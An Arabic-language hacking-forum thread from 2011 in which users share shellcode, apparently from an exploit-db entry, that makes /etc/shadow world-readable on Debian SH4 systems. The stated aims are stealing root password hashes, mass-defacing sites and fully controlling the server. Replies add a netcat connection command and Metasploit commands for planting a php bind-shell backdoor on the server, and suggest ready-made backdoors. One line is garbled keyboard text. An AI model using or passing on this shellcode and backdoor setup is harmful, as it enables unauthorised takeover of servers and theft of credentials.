تغرة لقراءة ملف etc/shadow جديدة

abdellatef · 07-05-2011, 05:53 PM

السلام عليكم شباب

تغرة قوية ان شاء الله لقراءة ملف shadow لي يحتوي على
يوزر وباسوورد root السرفر ممكن بقراءته عمل ماس ديفايس للسرفر
والتحكم الكامل بالسرفر :( :surprised:

التغرة
http://www.exploit-db.com/exploits/17432/

بسيط جدا الكود السورس :
#include <stdio.h>
#include <string.h>

char *SC = "\x17\xe3\x4a\x24\x02\xc3\x0f\xe3\x05\xc7\x03"
"\x64\x57\xe8\x05\xe9\x87\x09\x1a\x05\x03\x75"
"\x02\xc3\x3a\x23\x01\xe3\x4a\x24\x02\xc3\x2f"
"\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77";

int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
}

ما اعرف ايش هو دلك الشيل كود
المهم التغرة تعمل ب Debian-sh4 2.6.32-5-sh7751r

ساجرب ان شاء الله ربما ترفع الملف بصيغة .c وتشغله بالنت كات
ويتم عرض ملف shadow ساجرب ان شاء وارد
من يعرف طريقة الاستغلال يقول :d:yes::yes:
:diablo::diablo::diablo::diablo:

المصدر: :: vBspiders Professional Network ::

jyvm grvhxm lgt etcLshadow []d]m

4nT! H3lL · 07-05-2011, 05:58 PM

اها عندي مشاكل بالاتصال بالسيرفر وهاد المشكله

abdellatef · 07-05-2011, 06:09 PM

يلزمك تفتح بورت متلا بورت tcp 443
ويتصل بالطبع

4nT! H3lL · 07-05-2011, 09:15 PM

المشكله انا مشترك من كافيه نت ما عندي روتر
بس هل الثغره فى اصدار بي اتش بي معين او فى برنامج على السيرفر

Cyber Code · 07-05-2011, 09:31 PM

اقتباس

اقتباس


	المشكله انا مشترك من كافيه نت ما عندي روتر بس هل الثغره فى اصدار بي اتش بي معين او فى برنامج على السيرفر

أتصل مباشر مو عكسي

nc -vv ip port >> hacker
اما السرفر استخدم باك دور ميتا سبلويت
msf> use payload/php/bind_php
set rhost = server ip
set rport = 9999

مثلاً او فيك تستخدم باكدورات جاهزة على النت , او شوف اي موقع يقدم خدمة vpn والبورتات مفتوحه .

اقتباس


	chmod("/etc/shadow", 0666)

هذا موجود في العنوان تبع الثغرة , يعني اعتقد وضيفة هالملف اعطاء تصريح خاص للشادو بحيث تقدر تقراه \ تستعرضه . تم اختباره على نظام ديبيان ومؤكد

فيك تختبره بأنظمة اخرى .

جزاك الله خير

في أمان وحفظ الرحمن